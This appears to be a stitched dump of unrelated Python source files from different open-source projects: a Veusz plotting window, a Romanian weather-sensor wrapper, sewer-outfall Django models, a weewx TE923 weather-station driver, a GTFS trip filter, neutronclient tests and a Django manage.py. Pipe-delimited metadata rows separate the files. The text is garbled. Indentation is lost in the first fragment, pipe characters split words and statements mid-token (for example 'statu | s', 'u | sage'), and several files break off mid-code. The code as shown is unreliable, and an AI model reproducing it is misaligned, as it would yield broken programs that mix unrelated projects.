win.treeedit.doInitialWidgetSelect()
cls.windows.append(win)
# check if tutorial wanted (only for graph mode)
if not setting.settingdb['ask_tutorial'] and mode=='graph':
win.askTutorial()
# don't ask again
setting.settingdb['ask_tutorial'] = True
# check if version check is ok
win.askVersionCheck()
# periodically do the check
win.doVersionCheck()
# is it ok to do feedback?
win.askFeedbackCheck()
# periodically send feedback
win.doFeedback()
return win
    def __init__(self, *args):
        """Build the main window: document, plot area, editing docks,
        statusbar widgets, and the signal wiring between them."""
        qt4.QMainWindow.__init__(self, *args)
        self.setAcceptDrops(True)

        # icon and different size variations
        self.setWindowIcon( utils.getIcon('veusz') )

        # master document
        self.document = document.Document()

        # filename for document and update titlebar
        self.filename = ''
        self.updateTitlebar()

        # keep a list of references to dialogs
        self.dialogs = []

        # construct menus and toolbars
        self._defineMenus()

        # make plot window (central widget)
        self.plot = plotwindow.PlotWindow(self.document, self,
                                          menu = self.menus['view'])
        self.setCentralWidget(self.plot)
        self.plot.showToolbar()

        # likewise with the tree-editing window
        self.treeedit = treeeditwindow.TreeEditDock(self.document, self)
        self.addDockWidget(qt4.Qt.LeftDockWidgetArea, self.treeedit)
        self.propdock = treeeditwindow.PropertiesDock(self.document,
                                                      self.treeedit, self)
        self.addDockWidget(qt4.Qt.LeftDockWidgetArea, self.propdock)
        self.formatdock = treeeditwindow.FormatDock(self.document,
                                                    self.treeedit, self)
        self.addDockWidget(qt4.Qt.LeftDockWidgetArea, self.formatdock)
        self.datadock = DataNavigatorWindow(self.document, self, self)
        self.addDockWidget(qt4.Qt.RightDockWidgetArea, self.datadock)

        # make the console window a dock (hidden by default)
        self.console = consolewindow.ConsoleWindow(self.document,
                                                   self)
        self.console.hide()
        self.interpreter = self.console.interpreter
        self.addDockWidget(qt4.Qt.BottomDockWidgetArea, self.console)

        # assemble the statusbar
        statusbar = self.statusbar = qt4.QStatusBar(self)
        self.setStatusBar(statusbar)
        self.updateStatusbar(_('Ready'))

        # a label for the picker readout
        self.pickerlabel = qt4.QLabel(statusbar)
        self._setPickerFont(self.pickerlabel)
        statusbar.addPermanentWidget(self.pickerlabel)
        self.pickerlabel.hide()

        # plot queue - how many plots are currently being drawn
        self.plotqueuecount = 0
        self.plot.sigQueueChange.connect(self.plotQueueChanged)
        self.plotqueuelabel = qt4.QLabel()
        self.plotqueuelabel.setToolTip(_("Number of rendering jobs remaining"))
        statusbar.addWidget(self.plotqueuelabel)
        self.plotqueuelabel.show()

        # a label for the cursor position readout
        self.axisvalueslabel = qt4.QLabel(statusbar)
        statusbar.addPermanentWidget(self.axisvalueslabel)
        self.axisvalueslabel.show()
        self.slotUpdateAxisValues(None)

        # a label for the page number readout
        self.pagelabel = qt4.QLabel(statusbar)
        statusbar.addPermanentWidget(self.pagelabel)
        self.pagelabel.show()

        # working directory - use previous one, or the process cwd if the
        # user enabled that option
        self.dirname = setdb.get('dirname', qt4.QDir.homePath())
        if setdb['dirname_usecwd']:
            self.dirname = cgetcwd()

        # connect plot signals to main window
        self.plot.sigUpdatePage.connect(self.slotUpdatePage)
        self.plot.sigAxisValuesFromMouse.connect(self.slotUpdateAxisValues)
        self.plot.sigPickerEnabled.connect(self.slotPickerEnabled)
        self.plot.sigPointPicked.connect(self.slotUpdatePickerLabel)

        # disable save if already saved
        self.document.signalModified.connect(self.slotModifiedDoc)
        # if the treeeditwindow changes the page, change the plot window
        self.treeedit.sigPageChanged.connect(self.plot.setPageNumber)

        # if a widget in the plot window is clicked by the user
        self.plot.sigWidgetClicked.connect(self.treeedit.selectWidget)
        self.treeedit.widgetsSelected.connect(self.plot.selectedWidgets)

        # enable/disable undo/redo
        self.menus['edit'].aboutToShow.connect(self.slotAboutToShowEdit)

        # Get the list of recently opened files
        self.populateRecentFiles()
        self.setupWindowGeometry()
        self.defineViewWindowMenu()
|
ilogue/niprov | niprov/exceptions.py | Python | bsd-3-clause | 89 | 0 |
class NiprovError(Exception):
    """Base class for all errors raised by the niprov package."""
    pass
class UnknownFileError(NiprovError):
    """NiprovError subclass signalling that a file is not known."""
    pass
|
CityPulse/CP_Resourcemanagement | wrapper_dev/romania_weather/romaniaweather_aw.py | Python | mit | 9,102 | 0.003406 | # coding=utf-8
__author__ = 'Marten Fischer (m.fischer@hs-osnabrueck.de)'
from virtualisation.wrapper.abstractwrapper import AbstractComposedWrapper, AbstractWrapper
from virtualisation.sensordescription import SensorDescription
from virtualisation.wrapper.history.csvhistory import CSVHistoryReader
from virtualisation.wrapper.parser.csvparser import CSVParser
from virtualisation.wrapper.parser.jsonparser import JSONParser
from virtualisation.misc.log import Log
from virtualisation.wrapper.connection.httpconnection import HttpPullConnection
# from virtualisation.wrapper.splitter.abstractsplitter import AbstractSplitter
import os.path
import uuid
import urllib
def niceFilename(org):
    """Return *org* lowercased, with '(', ')', ' ' and '/' turned into '_'.

    Produces a filesystem-friendly name for per-station files.
    """
    cleaned = org
    for forbidden in ('(', ')', ' ', '/'):
        cleaned = cleaned.replace(forbidden, '_')
    return cleaned.lower()
class RomaniaWeatherConnection(HttpPullConnection):
    """HTTP pull connection that maps the station's placeholder reply
    ("Measurement not available") onto a missing reading (None)."""

    def __init__(self, wrapper):
        super(RomaniaWeatherConnection, self).__init__(wrapper)

    def next(self):
        payload = super(RomaniaWeatherConnection, self).next()
        # only pass through non-empty payloads that carry a real measurement
        if payload and payload.strip() != "Measurement not available":
            return payload
        return None
class InternalWeatherAWWrapper(AbstractWrapper):
    """Wrapper for one Romanian weather station.

    Live data is pulled as JSON over HTTP; in replay mode historic values
    are read back from a per-station CSV file in ``historicdata``.
    """

    def __init__(self, sensorDescription):
        super(InternalWeatherAWWrapper, self).__init__()
        self.sensorDescription = sensorDescription
        self.parser = JSONParser(self)
        self.connection = RomaniaWeatherConnection(self)

    def getSensorDescription(self):
        """Return the SensorDescription this wrapper was created with."""
        return self.sensorDescription

    def start(self):
        if self.replaymode:
            try:
                csvName = "weatherAW-%s.csv" % self.sensorDescription.sensorID
                historyFile = AbstractWrapper.getFileObject(
                    __file__, os.path.join("historicdata", csvName), "rU")
                self.historyreader = CSVHistoryReader(self, historyFile,
                                                      delimiter=';')
                self.historyparser = CSVParser(self, self.historyreader.headers)
            except Exception as error:
                # history file missing/unreadable: log and mark no history
                Log.e(error)
                self.historyreader = None
        super(InternalWeatherAWWrapper, self).start()
class RomanianWeatherAWWrapper(AbstractComposedWrapper):
def __init__(self):
super(RomanianWeatherAWWrapper, self).__init__()
basesensordescription = SensorDescription()
basesensordescription.namespace = "http://ict-citypulse.eu/"
basesensordescription.author = "cityofbrasov"
basesensordescription.sensorType = "Romanian_Weather"
basesensordescription.graphName = "romanian_weather#"
basesensordescription.sourceType = "pull_http"
basesensordescription.sourceFormat = "application/json"
basesensordescription.information = "Weather data of Romania"
basesensordescription.countryName = "Romania"
basesensordescription.movementBuffer = 3
basesensordescription.updateInterval = 60 * 60
basesensordescription.maxLatency = 2
basesensordescription.fields = ["aqisitionStation", "precipitations", "temperature", "timestamp", "wind"]
basesensordescription.field.aqisitionStation.propertyName = "Property"
basesensordescription.field.aqisitionStation.propertyPrefix = "ssn"
basesensordescription.field.aqisitionStation.propertyURI = basesensordescription.namespace + "romania/weather#Station"
basesensordescription.field.aqisitionStation.min = ""
basesensordescription.field.aqisitionStation.max = ""
basesensordescription.field.aqisitionStation.dataType = "str"
basesensordescription.field.aqisitionStation.showOnCityDashboard = True
basesensordescription.field.precipitations.propertyName = "Property"
basesensordescription.field.precipitations.propertyPrefix = "ssn"
basesensordescription.field.precipitations.propertyURI = \
basesensordescription.namespace + "romania/weather#Precipitation"
basesensordescription.field.precipitations.unit = basesensordescription.namespace + "unit:millimeter"
basesensordescription.field.precipitations.min = 0
basesensordescription.field.precipitations.max = 100
basesensordescription.field.precipitations.dataType = "float"
basesensordescription.field.precipitations.showOnCityDashboard = True
basesensordescription.field.precipitations.aggregationMethod = "sax"
basesensordescription.field.precipitations.aggregationConfiguration = {"alphabet_size": 5, "word_length": 3,
"unit_of_window": "hours", "window_duration": 1}
basesensordescription.field.temperature.propertyName = "Temperature"
basesensordescription.field.temperature.propertyURI = basesensordescription.namespace + "romania/weather#Temperature"
basesensordescription.field.temperature.unit = basesensordescription.namespace + "unit:degreecelsius"
basesensordescription.field.temperature.min = -40
basesensordescription.field.temperature.max = 70
basesensordescription.field.temperature.dataType = "int"
basesensordescription.field.temperature.showOnCityDashboard = True
basesensordescription.field.temperature.aggregationMethod = "sax"
basesensordescription.field.temperature.aggregationConfiguration = {"alphabet_size": 5, "word_length": 3,
"unit_of_window": "hours", "window_duration": 1}
basesensordescription.field.wind.propertyName = "WindSpeed"
basesensordescription.field.wind.propertyURI = basesensordescription.namespace + "romania/weather#WindSpeed"
basesensordescription.field.wind.unit = basesensordescription.namespace + "unit:km-per-hour"
basesensordescription.field.wind.min = 0
basesensordescription.field.wind.max = 50
basesensordescription.field.wind.dataType = "int"
basesensordescription.field.wind.showOnCityDashboard = True
basesensordescription.field.wind.aggregationMethod = "sax"
basesensordescription.field.wind.aggregationConfiguration = {"alphabet_size": 5, "word_length": 3,
"unit_of_window": "hours", "window_duration": 1}
basesensordescription.field.timestamp.propertyName = "MeasuredTime"
basesensordescription.field.timestamp.propertyURI = basesensordescription.namespace + "city#MeasuredTime"
basesensordescription.field.timestamp.unit = basesensordescription.namespace + "unit:time"
basesensordescription.field.timestamp.min = 0
basesensordescription.field.timestamp.max = 9999999999999
basesensordescription.field.timestamp.dataType = "long"
basesensordescription.field.timestamp.skip_annotation = True
basesensordescription.timestamp.inField = "timestamp"
basesensordescription.timestamp.format = "UNIX5"
locations = {
"Arad": "POINT(21.31 46.19)",
"Bacau": "POINT(26.91 46.57)",
"Baia Mare": "POINT(23.57 47.65)",
"Barlad": "POINT(27.67 46.23)",
"Bistrita": "POINT(24.04 45.19)",
"Botosani": "POINT(26.67 47.75)",
"Braila": "POINT(27.97 45.28)",
"Brasov": "POINT(25.60 45.65)",
"Bucuresti": "POINT(26.1 44.44)",
"Buzau": "POINT(26.82 45.15)",
"Calarasi": "POINT(23.85 46.48)",
"Cluj-Napoca": "POINT(23.61 46.78)",
"Constanta": "POINT(28.63 44.18)",
"Craiova": "POINT(23.8 44.32)",
"Deva": "POINT(22.9 45.88)",
"Drobeta Turnu Severin": "POINT(22.66 44.63)",
"Focsani": "POINT(27.18 45.69)",
"Galati": "POINT(28.04 45.44)",
"Iasi": "POINT(27.58 47.16)",
"Ploiesti": "POINT(26.02 44.94)",
"Piatra-Neamt": "POINT(26.37 46.93)",
"Ramnicu Valcea": "POINT(24.37 45.10)",
"Roman": "POINT(26.92 46.92)",
"Satu Mare": "POINT(22.88 47.78)",
"Sibiu": "POINT(24.15 45.79)",
"Slatina": "POINT(24.36 44.42)",
"Suceava": "POINT(26.15 47.60)",
"Targu-Mures": "POINT(24.55 46.54)",
|
NORCatUofC/rainapp | csos/models.py | Python | mit | 694 | 0 | from django.db import models
class RiverOutfall(models.Model):
    """An outfall location on the river (referenced by RiverCso events)."""
    # Human-readable name of the outfall.
    name = models.TextField()
    # Coordinates; nullable when the position is unknown.
    lat = models.FloatField(null=True)
    lon = models.FloatField(null=True)
class RiverCso(models.Model):
    """An overflow event at a river outfall, spanning open to close time."""
    # NOTE(review): ForeignKey without on_delete implies Django < 2.0 -- confirm.
    river_outfall = models.ForeignKey("RiverOutfall")
    open_time = models.DateTimeField()
    close_time = models.DateTimeField()
class LakeOutfall(models.Model):
    """An outfall location on the lake (referenced by LakeReversal events)."""
    # Human-readable name of the outfall.
    name = models.TextField()
    # Coordinates; nullable when the position is unknown.
    lat = models.FloatField(null=True)
    lon = models.FloatField(null=True)
class LakeReversal(models.Model):
    """A reversal event at a lake outfall, with its recorded volume."""
    # NOTE(review): ForeignKey without on_delete implies Django < 2.0 -- confirm.
    lake_outfall = models.ForeignKey("LakeOutfall")
    open_date = models.DateTimeField()
    close_date = models.DateTimeField()
    # Volume for the event, in millions of gallons (per the field name).
    millions_of_gallons = models.FloatField()
|
sai9/weewx-gitsvn | bin/weewx/drivers/te923.py | Python | gpl-3.0 | 39,957 | 0.001652 | #!/usr/bin/env python
# $Id$
# Copyright 2013 Matthew Wall
# See the file LICENSE.txt for your full rights.
#
# Thanks to Sebastian John for the te923tool written in C (v0.6.1):
# http://te923.fukz.org/
# Thanks to Mark Teel for the te923 implementation in wview:
# http://www.wviewweather.com/
"""Classes and functions for interfacing with te923 weather stations.
These stations were made by Hideki and branded as Honeywell, Meade, IROX Pro X,
Mebus TE923, and TFA Nexus. They date back to at least 2007 and are still
sold (sparsely in the US, more commonly in Europe) as of 2013.
Apparently there are at least two different memory sizes. One version can
store about 200 records, a newer version can store about 3300 records.
The firmware version of each component can be read by talking to the station,
assuming that the component has a wireless connection to the station, of
course.
To force connection between station and sensors, press and hold DOWN button.
To reset all station parameters:
- press and hold SNOOZE and UP for 4 seconds
- press SET button; main unit will beep
- wait until beeping stops
- remove batteries and wait 10 seconds
- reinstall batteries
From the Meade TE9233W manual (TE923W-M_IM(ENG)_BK_010511.pdf):
Remote temperature/humidty sampling interval: 10 seconds
Remote temperature/humidity transmit interval: about 47 seconds
Indoor temperature/humidity sampling interval: 10 seconds
Indoor pressure sampling interval: 20 minutes
Rain counter transmitting interval: 183 seconds
Wind direction transmitting interval: 33 seconds
Wind/Gust speed display update interval: 33 seconds
Wind/Gust sampling interval: 11 seconds
UV transmitting interval: 300 seconds
Rain counter resolution: 0.03 in (0.6578 mm)
Battery statu | s of each sensor is checked every ho | ur
This implementation polls the station for data. Use the polling_interval to
control the frequency of polling. Default is 10 seconds.
The manual says that a single bucket tip is 0.03 inches. In reality, a single
bucket tip is between 0.02 and 0.03 in (0.508 to 0.762 mm). This driver uses
a value of 0.02589 in (0.6578 mm) per bucket tip.
The station has altitude, latitude, longitude, and time.
Notes From/About Other Implementations
Apparently te923tool came first, then wview copied a bit from it. te923tool
provides more detail about the reason for invalid values, for example, values
out of range versus no link with sensors.
There are some disagreements between the wview and te923tool implementations.
From the te923tool:
- reading from usb in 8 byte chunks instead of all at once
- length of buffer is 35, but reads are 32-byte blocks
- windspeed and windgust state can never be -1
- index 29 in rain count, also in wind dir
From wview:
- wview does the 8-byte reads using interruptRead
- wview ignores the windchill value from the station
- wview treats the pressure reading as barometer (SLP), then calculates the
station pressure and altimeter pressure
Memory Map
0x002001 - current readings
0x000098 - firmware versions
1 - barometer
2 - uv
3 - rcc
4 - wind
5 - system
0x00004c - battery status
- rain
- wind
- uv
- 5
- 4
- 3
- 2
- 1
0x0000fb - records
Random Notes
Here are some tidbits for usb putzing. The documentation for reading/writing
USB in python is scarce. Apparently there are (at least) two ways of reading
from USB - one using interruptRead, the other doing bulk reads. Which you use
may depend on the device itself.
There are at least two Python interfaces, e.g. claim_interface vs
claimInterface.
usb_control_msg(0x21, # request type
0x09, # request
0x0200, # value
0x0000, # index
buf, # buffer
0x08, # size
timeout) # timeout
"""
# TODO: figure out how to set station time, if possible
# TODO: figure out how to read altitude from station
# TODO: figure out how to read station pressure from station
# TODO: figure out how to clear station memory
# TODO: figure out how to detect station memory size
# TODO: figure out how to modify the archive interval
# TODO: figure out how to read the archive interval
# TODO: figure out how to read lat/lon from station
# TODO: clear rain total
# TODO: get enumeration of usb.USBError codes to handle errors better
# TODO: consider open/close on each read instead of keeping open
# TODO: sensor data use 32 bytes, but each historical record is 38 bytes. what
# do the other 4 bytes represent?
# FIXME: speed up transfers:
# date;PYTHONPATH=bin python bin/weewx/drivers/te923.py --records 0 > b; date
# Tue Nov 26 10:37:36 EST 2013
# Tue Nov 26 10:46:27 EST 2013
# date; /home/mwall/src/te923tool-0.6.1/te923con -d > a; date
# Tue Nov 26 10:46:52 EST 2013
# Tue Nov 26 10:47:45 EST 2013
from __future__ import with_statement
import syslog
import time
import usb
import weewx.drivers
import weewx.wxformulas
DRIVER_NAME = 'TE923'
DRIVER_VERSION = '0.12'
def loader(config_dict, engine):
    # weewx entry point: build the driver from the [TE923] config section.
    return TE923Driver(**config_dict[DRIVER_NAME])
def configurator_loader(config_dict):
    # weewx entry point: command-line device configuration tool.
    return TE923Configurator()
def confeditor_loader():
    # weewx entry point: configuration-file stanza editor.
    return TE923ConfEditor()
DEBUG_READ = 0
DEBUG_DECODE = 0
DEBUG_PRESSURE = 0
# map the 5 remote sensors to columns in the database schema
DEFAULT_SENSOR_MAP = {
'outTemp': 't_1',
'outHumidity': 'h_1',
'extraTemp1': 't_2',
'extraHumid1': 'h_2',
'extraTemp2': 't_3',
'extraHumid2': 'h_3',
'extraTemp3': 't_4',
# WARNING: the following are not in the default schema
'extraHumid3': 'h_4',
'extraTemp4': 't_5',
'extraHumid4': 'h_5',
}
DEFAULT_BATTERY_MAP = {
'txBatteryStatus': 'batteryUV',
'windBatteryStatus': 'batteryWind',
'rainBatteryStatus': 'batteryRain',
'outTempBatteryStatus': 'battery1',
# WARNING: the following are not in the default schema
'extraBatteryStatus1': 'battery2',
'extraBatteryStatus2': 'battery3',
'extraBatteryStatus3': 'battery4',
'extraBatteryStatus4': 'battery5',
}
def logmsg(dst, msg):
    """Write msg to syslog at priority dst, prefixed with the driver name."""
    syslog.syslog(dst, 'te923: %s' % msg)
def logdbg(msg):
    """Log msg at debug priority."""
    logmsg(syslog.LOG_DEBUG, msg)
def loginf(msg):
    """Log msg at info priority."""
    logmsg(syslog.LOG_INFO, msg)
def logcrt(msg):
    """Log msg at critical priority."""
    logmsg(syslog.LOG_CRIT, msg)
def logerr(msg):
    """Log msg at error priority."""
    logmsg(syslog.LOG_ERR, msg)
class TE923ConfEditor(weewx.drivers.AbstractConfEditor):
    """Supplies the default [TE923] stanza for insertion into weewx.conf."""

    @property
    def default_stanza(self):
        # Returned text is inserted verbatim into the weewx configuration.
        # ConfigObj nests sections by bracket depth ([[...]]), not indentation.
        return """
[TE923]
# This section is for the Hideki TE923 series of weather stations.
# The station model, e.g., 'Meade TE923W' or 'TFA Nexus'
model = TE923
# The driver to use:
driver = weewx.drivers.te923
# The default configuration associates the channel 1 sensor with outTemp
# and outHumidity. To change this, or to associate other channels with
# specific columns in the database schema, use the following maps.
[[sensor_map]]
# Map the remote sensors to columns in the database schema.
outTemp = t_1
outHumidity = h_1
extraTemp1 = t_2
extraHumid1 = h_2
extraTemp2 = t_3
extraHumid2 = h_3
extraTemp3 = t_4
# WARNING: the following are not in the default schema
extraHumid3 = h_4
extraTemp4 = t_5
extraHumid4 = h_5
[[battery_map]]
txBatteryStatus = batteryUV
windBatteryStatus = batteryWind
rainBatteryStatus = batteryRain
outTempBatteryStatus = battery1
# WARNING: the following are not in the default schema
extraBatteryStatus1 = battery2
extraBatteryStatus2 = battery3
extraBatteryStatus3 = battery4
extraBatteryStatus4 = battery5
"""
class TE923Configurator(weewx.drivers.AbstractConfigurator):
    """Command-line configuration tool for TE923 stations."""

    @property
    def version(self):
        # driver version string reported by the configurator
        return DRIVER_VERSION
def add_options(self, parser):
super(TE923Configurator, self).add_options(parser)
parser.add_option("--info", dest="info", action="store_true",
help="display weather station configuration")
parser.add_option("--current", dest="current", action |
jonpetersen/transitfeed-1.2.12 | build/scripts-2.7/unusual_trip_filter.py | Python | apache-2.0 | 5,999 | 0.010502 | #!/usr/bin/python
# Copyright (C) 2007 Google Inc.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Filters out trips which are not on the defualt routes and
set their trip_typeattribute accordingly.
For usage information run unusual_trip_filter.py --help
"""
__author__ = 'Jiri Semecky <jiri.semecky@gmail.com>'
import codecs
import os
import os.path
import sys
import time
import transitfeed
from transitfeed import util
class UnusualTripFilter(object):
  """Class filtering trips going on unusual paths.

  Those are usually trips going to/from depot or changing to another route
  in the middle. Sets the 'trip_type' attribute of the trips.txt dataset
  so that non-standard trips are marked as special (value 1)
  instead of regular (default value 0).
  """

  def __init__ (self, threshold=0.1, force=False, quiet=False, route_type=None):
    # threshold: patterns carrying less than this fraction of a route's
    #            trips are considered unusual.
    # force: rewrite trip_type on all trips, not only the unusual ones.
    # quiet: suppress informational output.
    # route_type: only filter routes of this type (symbolic name or number).
    self._threshold = threshold
    self._quiet = quiet
    self._force = force
    if route_type in transitfeed.Route._ROUTE_TYPE_NAMES:
      # symbolic name such as 'Bus' -> numeric route type
      self._route_type = transitfeed.Route._ROUTE_TYPE_NAMES[route_type]
    elif route_type is None:
      self._route_type = None
    else:
      self._route_type = int(route_type)

  def filter_line(self, route):
    """Mark unusual trips for the given route."""
    if self._route_type is not None and self._route_type != route.route_type:
      self.info('Skipping route %s due to different route_type value (%s)' %
                (route['route_id'], route['route_type']))
      return
    self.info('Filtering infrequent trips for route %s.' % route.route_id)
    trip_count = len(route.trips)
    for pattern_id, pattern in route.GetPatternIdTripDict().items():
      # fraction of the route's trips that follow this stop pattern
      ratio = float(1.0 * len(pattern) / trip_count)
      if not self._force:
        if (ratio < self._threshold):
          self.info("\t%d trips on route %s with headsign '%s' recognized "
                    "as unusual (ratio %f)" %
                    (len(pattern),
                     route['route_short_name'],
                     pattern[0]['trip_headsign'],
                     ratio))
          for trip in pattern:
            trip.trip_type = 1 # special
            self.info("\t\tsetting trip_type of trip %s as special" %
                      trip.trip_id)
      else:
        self.info("\t%d trips on route %s with headsign '%s' recognized "
                  "as %s (ratio %f)" %
                  (len(pattern),
                   route['route_short_name'],
                   pattern[0]['trip_headsign'],
                   ('regular', 'unusual')[ratio < self._threshold],
                   ratio))
        for trip in pattern:
          # NOTE(review): this branch stores the strings '0'/'1' while the
          # non-force branch stores the integer 1 -- confirm both forms are
          # acceptable to the trips.txt writer.
          trip.trip_type = ('0','1')[ratio < self._threshold]
          self.info("\t\tsetting trip_type of trip %s as %s" %
                    (trip.trip_id,
                     ('regular', 'unusual')[ratio < self._threshold]))

  def filter(self, dataset):
    """Mark unusual trips for all the routes in the dataset."""
    self.info('Going to filter infrequent routes in the dataset')
    for route in dataset.routes.values():
      self.filter_line(route)

  def info(self, text):
    # honour --quiet; output is UTF-8 encoded for Python 2 consoles
    if not self._quiet:
      print text.encode("utf-8")
def main():
u | sage = \
'''%prog [options] <GTFS.zip>
Sets the trip_type for trips that have an unusual pattern for a route.
<GTFS.zip> is overwritten with the modifed GTFS file unless the --output
option is used.
For more information see
http://code.google.com/p/googletransitdatafeed/wiki/UnusualTripFilter
'''
p | arser = util.OptionParserLongError(
usage=usage, version='%prog '+transitfeed.__version__)
parser.add_option('-o', '--output', dest='output', metavar='FILE',
help='Name of the output GTFS file (writing to input feed if omitted).')
parser.add_option('-m', '--memory_db', dest='memory_db', action='store_true',
help='Force use of in-memory sqlite db.')
parser.add_option('-t', '--threshold', default=0.1,
dest='threshold', type='float',
help='Frequency threshold for considering pattern as non-regular.')
parser.add_option('-r', '--route_type', default=None,
dest='route_type', type='string',
help='Filter only selected route type (specified by number'
'or one of the following names: ' + \
', '.join(transitfeed.Route._ROUTE_TYPE_NAMES) + ').')
parser.add_option('-f', '--override_trip_type', default=False,
dest='override_trip_type', action='store_true',
help='Forces overwrite of current trip_type values.')
parser.add_option('-q', '--quiet', dest='quiet',
default=False, action='store_true',
help='Suppress information output.')
(options, args) = parser.parse_args()
if len(args) != 1:
parser.error('You must provide the path of a single feed.')
filter = UnusualTripFilter(float(options.threshold),
force=options.override_trip_type,
quiet=options.quiet,
route_type=options.route_type)
feed_name = args[0]
feed_name = feed_name.strip()
filter.info('Loading %s' % feed_name)
loader = transitfeed.Loader(feed_name, extra_validation=True,
memory_db=options.memory_db)
data = loader.Load()
filter.filter(data)
print 'Saving data'
# Write the result
if options.output is None:
data.WriteGoogleTransitFeed(feed_name)
else:
data.WriteGoogleTransitFeed(options.output)
if __name__ == '__main__':
  # Run under the crash handler so failures produce a diagnostic report.
  util.RunWithCrashHandler(main)
|
vichoward/python-neutronclient | neutronclient/tests/unit/test_name_or_id.py | Python | apache-2.0 | 5,590 | 0 | # Copyright 2012 OpenStack Foundation.
# All Rights Reserved
#
# Licensed under the Apache License, Version 2.0 (the "License"); you may
# not use this file except in compliance with the License. You may obtain
# a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS, WITHOUT
# WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied. See the
# License for the specific language governing permissions and limitations
# under the License.
#
# vim: tabstop=4 shiftwidth=4 softtabstop=4
import uuid
import mox
import testtools
from neutronclient.common import exceptions
from neutronclient.neutron import v2_0 as neutronV20
from neutronclient.tests.unit import test_cli20
from neutronclient.v2_0 import client
class CLITestNameorID(testtools.TestCase):
    def setUp(self):
        """Prepare the test environment: mox and a token-authenticated client."""
        super(CLITestNameorID, self).setUp()
        self.mox = mox.Mox()
        self.endurl = test_cli20.ENDURL
        self.client = client.Client(token=test_cli20.TOKEN,
                                    endpoint_url=self.endurl)
        # verify and unstub the mocks even when a test fails
        self.addCleanup(self.mox.VerifyAll)
        self.addCleanup(self.mox.UnsetStubs)
    def test_get_id_from_id(self):
        """Looking up by an existing UUID resolves via the id filter alone."""
        _id = str(uuid.uuid4())
        reses = {'networks': [{'id': _id, }, ], }
        resstr = self.client.serialize(reses)
        self.mox.StubOutWithMock(self.client.httpclient, "request")
        path = getattr(self.client, "networks_path")
        # expect exactly one GET, filtered by id
        self.client.httpclient.request(
            test_cli20.end_url(path, "fields=id&id=" + _id), 'GET',
            body=None,
            headers=mox.ContainsKeyValue('X-Auth-Token', test_cli20.TOKEN)
        ).AndReturn((test_cli20.MyResp(200), resstr))
        self.mox.ReplayAll()
        returned_id = neutronV20.find_resourceid_by_name_or_id(
            self.client, 'network', _id)
        self.assertEqual(_id, returned_id)
    def test_get_id_from_id_then_name_empty(self):
        """If the id filter matches nothing, lookup falls back to the name
        filter and resolves from there."""
        _id = str(uuid.uuid4())
        reses = {'networks': [{'id': _id, }, ], }
        resstr = self.client.serialize(reses)
        resstr1 = self.client.serialize({'networks': []})
        self.mox.StubOutWithMock(self.client.httpclient, "request")
        path = getattr(self.client, "networks_path")
        # first GET by id returns an empty list ...
        self.client.httpclient.request(
            test_cli20.end_url(path, "fields=id&id=" + _id), 'GET',
            body=None,
            headers=mox.ContainsKeyValue('X-Auth-Token', test_cli20.TOKEN)
        ).AndReturn((test_cli20.MyResp(200), resstr1))
        # ... then the fallback GET by name returns the match
        self.client.httpclient.request(
            test_cli20.end_url(path, "fields=id&name=" + _id), 'GET',
            body=None,
            headers=mox.ContainsKeyValue('X-Auth-Token', test_cli20.TOKEN)
        ).AndReturn((test_cli20.MyResp(200), resstr))
        self.mox.ReplayAll()
        returned_id = neutronV20.find_resourceid_by_name_or_id(
            self.client, 'network', _id)
        self.assertEqual(_id, returned_id)
    def test_get_id_from_name(self):
        """Looking up by a unique name returns the matching network's id."""
        name = 'myname'
        _id = str(uuid.uuid4())
        reses = {'networks': [{'id': _id, }, ], }
        resstr = self.client.serialize(reses)
        self.mox.StubOutWithMock(self.client.httpclient, "request")
        path = getattr(self.client, "networks_path")
        # expect exactly one GET, filtered by name
        self.client.httpclient.request(
            test_cli20.end_url(path, "fields=id&name=" + name), 'GET',
            body=None,
            headers=mox.ContainsKeyValue('X-Auth-Token', test_cli20.TOKEN)
        ).AndReturn((test_cli20.MyResp(200), resstr))
        self.mox.ReplayAll()
        returned_id = neutronV20.find_resourceid_by_name_or_id(
            self.client, 'network', name)
        self.assertEqual(_id, returned_id)
def test_get_id_from_name_multiple(self):
name = 'myname'
reses = {'networks': [{'id': str(uuid.uuid4())},
{'id': str(uuid.uuid4())}]}
resstr = self.client.serialize(reses)
self.mox.StubOutWithMock(self.client.httpclient, "request")
path = getattr(self.client, "networks_path")
self.client.httpclient.request(
test_cli20.end_url(path, "fields=id&name=" + name), 'GET',
body=None,
headers=mox.ContainsKeyValue('X-Auth-Token', test_cli20.TOKEN)
).AndReturn((test_cli20.MyResp(200), resstr))
self.mox.ReplayAll()
try:
neutronV20.find_resourceid_by_name_or_id(
self.client, 'network', name)
except exceptions.NeutronClientNoUniqueMatch as ex:
self.assertTrue('Multiple' in ex.message)
def test_get_id_from_name_notfound(self):
name = 'myname'
reses = {'networks': []}
resstr = self.client.serialize(reses)
self.mox.StubOutWithMock(self.client.httpclient, "request")
path = getattr(self.client, "networks_path")
self.client.httpclient.request(
test_cli20.end_url(path, "fields=id&name=" + name), 'GET',
body=None,
headers=mox.ContainsKeyValue('X-Auth-Token', test_cli20.TOKEN)
).AndReturn((test_cli20.MyResp(200), resstr))
self.mox.ReplayAll()
try:
neutronV20.find_resourceid_by_name_or_id(
self.client, 'network', name)
except exceptions.NeutronClientException as ex:
self.assertTrue('Unable to find' in ex.message)
self.assertEqual(404, ex.status_code)
|
HiSchoolProject/BackSchool | manage.py | Python | lgpl-3.0 | 1,016 | 0 | #!/usr/bin/env python
import os
import sys
if __name__ == "__main__":
    # Point Django at the project settings before anything imports them.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "hischool.settings")
    # Add the "core" and "extensions" folders to the path
    sys.path.insert(0, os.path.join(os.path.dirname(__file__), "extensions"))
    sys.path.insert(0, os.path.join(os.path.dirname(__file__), "core"))
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
